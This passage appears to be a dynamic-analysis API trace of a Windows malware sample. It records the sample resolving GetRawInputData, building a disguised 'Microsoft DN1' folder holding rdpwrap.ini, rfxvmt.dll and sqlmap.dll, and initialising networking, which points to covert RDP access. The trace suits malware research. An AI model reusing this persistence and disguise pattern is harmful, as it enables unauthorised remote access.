lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowInBand", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowInBandEx", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowIndirect", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0288.972] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0288.973] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DeferWindowPosAndBand", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0288.974] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionEvent", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionState", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DwmKernelShutdown", lpString2="GetRawInputData") returned -1 [0288.975] lstrcmpA (lpString1="DwmKernelStartup", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="DwmLockScreenUpdates", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="DwmValidateWindow", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnableChildWindowDpiMessage", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnableMouseInPointer", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnableSessionForMMCSS", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EndDeferWindowPosEx", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0288.976] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0288.977] GetProcessHeap () returned 0x8a0000 [0288.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8bccb8 [0288.977] lstrlenW (lpString="TermService") returned 11 [0288.977] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.977] lstrlenW (lpString="TermService") returned 11 [0288.977] lstrcpyW (in: lpString1=0x870000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0288.977] lstrlenW (lpString="TermService") returned 11 [0288.977] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x880000 [0288.978] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0288.978] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.978] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.978] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.979] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.979] lstrcpyW (in: lpString1=0x870000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0288.979] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.979] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x890000 [0288.979] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0288.979] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.980] lstrlenW (lpString="%windir%\\System32") returned 17 [0288.980] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.980] lstrlenW (lpString="%windir%\\System32") returned 17 [0288.980] lstrcpyW (in: lpString1=0x870000, lpString2="%windir%\\System32" | out: lpString1="%windir%\\System32") returned="%windir%\\System32" [0288.980] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32", lpDst=0x21cfb00, nSize=0x1ff | out: lpDst="C:\\Windows\\System32") returned 0x14 [0288.980] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0288.980] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000 [0288.980] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0288.980] lstrcpyW (in: lpString1=0x21d0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0288.980] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0288.980] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2e10000 [0288.981] lstrcpyW (in: lpString1=0x2e10000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0288.981] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.981] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.982] GetCurrentProcess () returned 0xffffffff [0288.982] GetModuleHandleA (lpModuleName="kernel32") returned 0x74c90000 [0288.982] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0288.982] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x21cfef0 | out: Wow64Process=0x21cfef0*=1) returned 1 [0288.982] VirtualFree (lpAddress=0x890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.983] lstrlenW (lpString="%ProgramW6432%") returned 14 [0288.983] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.983] lstrlenW (lpString="%ProgramW6432%") returned 14 [0288.983] lstrcpyW (in: lpString1=0x870000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0288.983] lstrlenW (lpString="%ProgramW6432%") returned 14 [0288.983] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x890000 [0288.983] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0288.983] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.984] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x21cfb00, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0288.984] lstrlenW (lpString="C:\\Program Files") returned 16 [0288.984] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.985] lstrlenW (lpString="C:\\Program Files") returned 16 [0288.985] lstrcpyW (in: lpString1=0x870000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0288.985] lstrlenW (lpString="C:\\Program Files") returned 16 [0288.985] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000 [0288.986] lstrcpyW (in: lpString1=0x21d0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0288.986] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.986] VirtualFree (lpAddress=0x890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.987] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.987] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.987] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.987] lstrcpyW (in: lpString1=0x870000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0288.988] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.988] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x890000 [0288.988] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0288.988] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.989] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0288.989] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.989] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0288.990] lstrcpyW (in: lpString1=0x870000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0288.990] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0288.990] lstrlenW (lpString="C:\\Program Files") returned 16 [0288.990] VirtualQuery (in: lpAddress=0x21d0000, lpBuffer=0x21cfea4, dwLength=0x1c | out: lpBuffer=0x21cfea4*(BaseAddress=0x21d0000, AllocationBase=0x21d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0288.990] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0288.990] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.991] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0288.991] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.992] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0288.992] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.992] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0288.992] lstrcpyW (in: lpString1=0x870000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0288.992] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0288.992] lstrlenW (lpString="%ProgramFiles%") returned 14 [0288.992] VirtualQuery (in: lpAddress=0x890000, lpBuffer=0x21cfea4, dwLength=0x1c | out: lpBuffer=0x21cfea4*(BaseAddress=0x890000, AllocationBase=0x890000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0288.992] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000 [0288.993] VirtualFree (lpAddress=0x890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.993] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0288.993] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.994] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0288.994] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.994] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0288.994] lstrcpyW (in: lpString1=0x870000, lpString2="\\rfxvmt.dll" | out: lpString1="\\rfxvmt.dll") returned="\\rfxvmt.dll" [0288.995] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0288.995] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0288.995] VirtualQuery (in: lpAddress=0x2e10000, lpBuffer=0x21cfea4, dwLength=0x1c | out: lpBuffer=0x21cfea4*(BaseAddress=0x2e10000, AllocationBase=0x2e10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0288.995] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x890000 [0288.995] VirtualFree (lpAddress=0x2e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.996] lstrcatW (in: lpString1="C:\\Windows\\System32", lpString2="\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll" [0288.996] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0288.997] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 183 [0288.998] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0288.998] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0288.999] lstrcpyW (in: lpString1=0x870000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0288.999] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0288.999] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e10000 [0288.999] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0288.999] lstrcpyW (in: lpString1=0x2e10000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0289.000] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0289.000] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0289.000] VirtualQuery (in: lpAddress=0x870000, lpBuffer=0x21cfea4, dwLength=0x1c | out: lpBuffer=0x21cfea4*(BaseAddress=0x870000, AllocationBase=0x870000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0289.000] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x31f0000 [0289.000] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.001] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0289.001] VirtualFree (lpAddress=0x2e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.002] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0289.002] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0289.002] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0289.002] lstrcpyW (in: lpString1=0x870000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0289.002] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0289.002] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0289.002] VirtualQuery (in: lpAddress=0x31e0000, lpBuffer=0x21cfea4, dwLength=0x1c | out: lpBuffer=0x21cfea4*(BaseAddress=0x31e0000, AllocationBase=0x31e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0289.002] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x2e10000 [0289.003] VirtualFree (lpAddress=0x31e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.004] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0289.004] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.004] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0289.004] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0289.004] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0289.004] lstrcpyW (in: lpString1=0x870000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0289.005] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0289.005] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0289.005] VirtualQuery (in: lpAddress=0x21d0000, lpBuffer=0x21cfea4, dwLength=0x1c | out: lpBuffer=0x21cfea4*(BaseAddress=0x21d0000, AllocationBase=0x21d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0289.005] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0289.005] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.005] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0289.005] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.008] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x870000 [0289.008] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x270 [0289.008] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2d3dba4 | out: lpWSAData=0x2d3dba4) returned 0 [0289.013] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000 [0289.013] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x288 [0289.013] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2d3dd84 | out: lpWSAData=0x2d3dd84) returned 0 [0289.013] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x28c [0289.014] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0289.014] GetTickCount () returned 0x1c464 [0289.014] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x21cf9d0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0289.014] GetProcessHeap () returned 0x8a0000 [0289.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x400000) returned 0x320a020 [0289.024] CreateFileA (lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 